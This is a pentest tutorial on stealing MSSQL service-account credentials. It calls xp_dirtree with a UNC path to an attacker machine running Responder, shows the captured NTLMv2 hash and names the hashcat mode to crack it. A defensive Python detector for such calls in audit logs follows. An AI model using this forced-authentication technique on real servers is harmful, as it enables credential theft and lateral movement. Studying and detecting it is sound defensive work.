Today, I am going to share an interesting way of stealing credentials from MSSQL services. Maybe someday you get stuck during your penetration test even though you have compromised MSSQL server credentials, perhaps in a situation where you cannot find any interesting information in the database. In this tutorial I share another simple idea for when you get stuck.
Another thing to do when you get stuck is to steal the MSSQL service account credentials, which may be useful for your lateral movement. The attack uses the xp_dirtree functionality to browse a file share on your hacking machine that is running Responder, which forces the server to authenticate to it and hand over its authentication token (the NTLMv2 response).
Example: SQL> xp_dirtree 'C:\Users',0,1;
xp_dirtree has three parameters:
- directory – The directory you pass when you call the stored procedure.
- depth – How many subfolder levels the stored procedure displays. The default of 0 displays all subfolders.
- file – Whether to display files as well as each folder. The default of 0 does not display any files.
You can also use xp_dirtree to browse a UNC path, for example:
SQL> xp_dirtree '\\10.10.14.3\rio'
With that capability you can run Responder on your attacker machine to capture the token:
[SMB] NTLMv2-SSP Client : 192.168.2.19
[SMB] NTLMv2-SSP Username : RIO-SERVER\mssql-svc
[SMB] NTLMv2-SSP Hash : mssql-svc::RIO-SERVER:289968fad4d78dd…
With that hash you can then run hashcat with hash mode 5600 (NetNTLMv2). Happy cracking.
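From the defender's side, the thing to look for in SQL Server audit output is exactly the call shown above: xp_dirtree with a UNC argument, which makes the service account authenticate outbound over SMB. The following Python is an added example and not code from the original post: it scans constructed audit lines for xp_dirtree calls, separates local paths from UNC paths, and rates any UNC host that is not on an allowlist of known file servers as high severity. The audit line format ("<timestamp> <login> <statement>"), the host names and the allowlist are assumptions; only the 10.10.14.3 path comes from the post.

```python
import re
from dataclasses import dataclass
from typing import FrozenSet, Iterable, List, Tuple

# Constructed sample audit lines (not real logs): "<timestamp> <login> <T-SQL statement>".
# The 10.10.14.3 UNC path is the one from the post; the other host is made up.
SAMPLE_AUDIT_LINES = [
    "2024-01-01T10:00:01Z app_user EXEC xp_dirtree 'C:\\Users',0,1;",
    "2024-01-01T10:00:02Z app_user SELECT name FROM sys.databases;",
    "2024-01-01T10:00:03Z sa EXEC master..xp_dirtree '\\\\10.10.14.3\\rio';",
    "2024-01-01T10:00:04Z reporter xp_dirtree '\\\\fileserver.corp.example\\share',1,0",
]

# First quoted argument of xp_dirtree, whether or not the call is schema-qualified or uses EXEC.
XP_DIRTREE_RE = re.compile(r"\bxp_dirtree\s*'([^']*)'", re.IGNORECASE)
IPV4_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


@dataclass
class Finding:
    line_no: int
    login: str
    path: str
    host: str       # empty for local paths
    severity: str   # "high", "low" or "info"


def classify_path(path: str, allowed_hosts: FrozenSet[str]) -> Tuple[str, str]:
    """Return (host, severity) for an xp_dirtree directory argument.

    A UNC path makes the SQL Server service account authenticate to that host over SMB,
    so any host outside the allowlist is rated high; bare IP literals are never trusted.
    """
    if not path.startswith("\\\\"):
        return "", "info"                      # local path: no outbound authentication
    host = path[2:].split("\\", 1)[0].lower()
    if host in allowed_hosts and not IPV4_RE.fullmatch(host):
        return host, "low"
    return host, "high"


def find_xp_dirtree_calls(lines: Iterable[str], allowed_hosts: FrozenSet[str] = frozenset()) -> List[Finding]:
    findings = []
    for line_no, line in enumerate(lines, start=1):
        parts = line.split(" ", 2)
        if len(parts) < 3:
            continue                           # malformed line, skip it
        _ts, login, statement = parts
        for match in XP_DIRTREE_RE.finditer(statement):
            host, severity = classify_path(match.group(1), allowed_hosts)
            findings.append(Finding(line_no, login, match.group(1), host, severity))
    return findings


if __name__ == "__main__":
    for f in find_xp_dirtree_calls(SAMPLE_AUDIT_LINES, frozenset({"fileserver.corp.example"})):
        print(f"line {f.line_no}: {f.login} -> {f.path!r} [{f.severity}]")
```

Even the "info" findings are worth reviewing: an application login that can execute xp_dirtree at all has more than it needs.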